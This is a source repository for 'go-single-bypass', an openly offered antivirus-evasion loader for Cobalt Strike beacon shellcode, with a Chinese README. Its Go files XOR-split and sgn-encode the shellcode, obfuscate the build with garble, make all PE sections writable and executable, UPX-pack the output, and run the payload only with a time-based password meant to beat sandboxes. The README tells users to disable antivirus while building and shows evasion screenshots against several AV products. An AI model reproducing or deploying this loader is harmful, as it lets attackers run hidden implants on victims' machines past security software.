├── utils ├── sgn.exe ├── upx.exe └── keystone.dll ├── go.mod ├── README.assets ├── image-20220421152204905.png ├── image-20220421153149751.png ├── image-20220421153247347.png ├── image-20220421154009202.png ├── image-20220421154326483.png └── image-20220421154802358.png ├── go.sum ├── make.go ├── stub └── stub.go ├── fixer └── fixer.go ├── LICENSE ├── packer └── packer.go └── README.md /utils/sgn.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/utils/sgn.exe -------------------------------------------------------------------------------- /utils/upx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/utils/upx.exe -------------------------------------------------------------------------------- /utils/keystone.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/utils/keystone.dll -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/vyrus001/go-mimikatz 2 | 3 | go 1.17 4 | 5 | require github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf 6 | -------------------------------------------------------------------------------- /README.assets/image-20220421152204905.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421152204905.png -------------------------------------------------------------------------------- /README.assets/image-20220421153149751.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421153149751.png -------------------------------------------------------------------------------- /README.assets/image-20220421153247347.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421153247347.png -------------------------------------------------------------------------------- /README.assets/image-20220421154009202.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421154009202.png -------------------------------------------------------------------------------- /README.assets/image-20220421154326483.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421154326483.png -------------------------------------------------------------------------------- /README.assets/image-20220421154802358.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421154802358.png -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf h1:Cx4YJvjPZD91xiffqJOq8l3j1YKcvx3+8duqq7DX9gY= 2 | github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ= 3 | -------------------------------------------------------------------------------- /make.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | //go:generate cmd.exe /c echo author:piiperxyz 4 | //go:generate go install mvdan.cc/garble@latest 5 | //go:generate utils/sgn.exe -a 64 -o packer/beacon.bin packer/beacon.bin 6 | //go:generate go run packer/packer.go -o stub 7 | //go:generate garble build -o stub/stub stub/stub.go 8 | //go:generate go run fixer/fixer.go -s stub/stub -o cold.exe 9 | //go:generate utils/upx.exe cold.exe -9 10 | -------------------------------------------------------------------------------- /stub/stub.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | _ "embed" 5 | "fmt" 6 | "os" 7 | "strconv" 8 | "syscall" 9 | "time" 10 | "unsafe" 11 | ) 12 | 13 | var ( 14 | //go:embed "pad1" 15 | pad1 []byte 16 | //go:embed "pad2" 17 | pad2 []byte 18 | ) 19 | 20 | func main() { 21 | runflag := false 22 | t := time.Now() 23 | hour := t.Hour() 24 | minute := t.Minute() 25 | day := t.Day() 26 | pass := strconv.Itoa(hour) + strconv.Itoa(minute) + strconv.Itoa(day) 27 | if len(os.Args) < 2 { 28 | fmt.Printf("No such file or directory") 29 | os.Exit(0) 30 | } 31 | if os.Args[1] == pass { 32 | runflag = true 33 | } 34 | if runflag { 35 | for index, padByte := range pad1 { 36 | pad2[index] = pad2[index] ^ padByte 37 | } 38 | syscall.Syscall(uintptr(unsafe.Pointer(&pad2[0])), 0, 0, 0, 0) 39 | } else { 40 | fmt.Printf("No such file or directory") 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /fixer/fixer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "os" 6 | 7 | "github.com/Binject/debug/pe" 8 | ) 9 | 10 | const IMAGE_SCN_MEM_WRITE = 0x80000000 11 | 12 | var stubPath, outputPath string 13 | 14 | func checkErr(err error) { 15 | if err != nil { 16 | panic(err) 17 | } 18 | } 19 | 20 | func init() { 21 | flag.StringVar(&outputPath, "o", "", "where to put the finished file") 22 | flag.StringVar(&stubPath, "s", "", "where to find the stub file") 23 | flag.Parse() 24 | if (len(outputPath) < 1) || (len(stubPath) < 1) { 25 | flag.Usage() 26 | os.Exit(0) 27 | } 28 | } 29 | 30 | func main() { 31 | stub, err := pe.Open(stubPath) 32 | checkErr(err) 33 | for index := range stub.Sections { 34 | newPerms := stub.Section(stub.Sections[index].Name).Characteristics | IMAGE_SCN_MEM_WRITE | pe.IMAGE_SCN_MEM_EXECUTE 35 | stub.Section(stub.Sections[index].Name).Characteristics = newPerms 36 | } 37 | stub.WriteFile(outputPath) 38 | stub.Close() 39 | os.Remove("stub\\pad1") 40 | os.Remove("stub\\pad2") 41 | os.Remove("stub\\stub") 42 | } 43 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 piiperxyz 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /packer/packer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | _ "embed" 6 | "flag" 7 | "fmt" 8 | "io/ioutil" 9 | "math/rand" 10 | "os" 11 | "path" 12 | "runtime" 13 | "time" 14 | ) 15 | 16 | var exePrefix, outputSuffix, outputPath, stub string 17 | 18 | //go:embed beacon.bin 19 | var shellcodeByte []byte 20 | 21 | func init() { 22 | switch runtime.GOARCH { 23 | case "amd64": 24 | exePrefix = "x64" 25 | outputSuffix = "_amd64" 26 | case "386", "amd64p32": 27 | exePrefix = "Win32" 28 | outputSuffix = "_386" 29 | default: 30 | fmt.Println("This arch is not compatible with mimikatz") 31 | os.Exit(0) 32 | } 33 | 34 | flag.StringVar(&outputPath, "o", "", "where to put the pads") 35 | flag.Parse() 36 | if len(outputPath) < 1 { 37 | flag.Usage() 38 | os.Exit(0) 39 | } 40 | } 41 | 42 | func checkFatalErr(err error) { 43 | if err != nil { 44 | panic(err) 45 | } 46 | } 47 | 48 | func main() { 49 | 50 | shellcode := bytes.NewBuffer(shellcodeByte) 51 | pad1 := make([]byte, len(shellcode.Bytes())) 52 | pad2 := make([]byte, len(shellcode.Bytes())) 53 | rand.Seed(time.Now().UnixNano()) 54 | for index, shellcodeByte := range shellcode.Bytes() { 55 | pad1[index] = byte(rand.Int()) 56 | pad2[index] = pad1[index] ^ shellcodeByte 57 | } 58 | 59 | checkFatalErr(ioutil.WriteFile(path.Join(outputPath, "pad1"), pad1, 0777)) 60 | checkFatalErr(ioutil.WriteFile(path.Join(outputPath, "pad2"), pad2, 0777)) 61 | } 62 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # go-single-bypass 2 | 3 | 一个简单的免杀,主要参考go-mimikatz,使其技术能够运用到CS的shellcode上。另外添加了upx、sgn和garble进行混淆和压缩 4 | 5 | ## 免责声明 6 | 7 | 该工具仅用于安全研究,禁止使用工具发起非法攻击等违法行为,造成的后果使用者负责 8 | 9 | ## 如何使用 10 | 11 | 将CS stagerless生成的beacon.bin放到packer文件夹下,在主目录输入: 12 | 13 | ```go 14 | go generate 15 | ``` 16 | 17 | 主目录生成的cold.exe即为免杀马,需添加启动参数,启动参数为小时分钟日期,若运行木马的时间为12:21,4月15日,则启动密码为122115 18 | 19 | 注意: 20 | 21 | * 需下载好go环境,目前测试是在windows+64位环境下可正常生成 22 | * 生成的中间文件可能不免杀,在生成的过程中需要将杀软关闭! 23 | * upx.exe和sgn.exe是github上下载的,若不放心可自行替换即可 24 | * 如果下载依赖过慢配置镜像`go env -w GOPROXY=https://goproxy.cn,direct`,如果是第一次安装go建议先执行该命令 25 | 26 | ## 更新 27 | 28 | 2022/04/21 添加启动参数对抗沙箱,添加测试截图 29 | 30 | 2022/04/20 发布 31 | 32 | ## 参考 33 | 34 | https://github.com/vyrus001/go-mimikatz 35 | 36 | https://github.com/burrowers/garble 37 | 38 | https://github.com/upx/upx 39 | 40 | https://github.com/EgeBalci/sgn 41 | 42 | ## 测试效果: 43 | 44 | 测试时间:2022/04/21 45 | 46 | ![image-20220421152204905](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421152204905.png) 47 | 48 | 360效果时好时坏,只能说不要一个马用很久吧 49 | 50 | ![image-20220421153149751](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421153149751.png) 51 | 52 | ![image-20220421153247347](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421153247347.png) 53 | 54 | 火绒 55 | 56 | ![image-20220421154009202](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421154009202.png) 57 | 58 | windows defender 59 | 60 | ![image-20220421154326483](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421154326483.png) 61 | 62 | 卡巴免费版 63 | 64 | ![image-20220421154802358](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421154802358.png) 65 | 66 | --------------------------------------------------------------------------------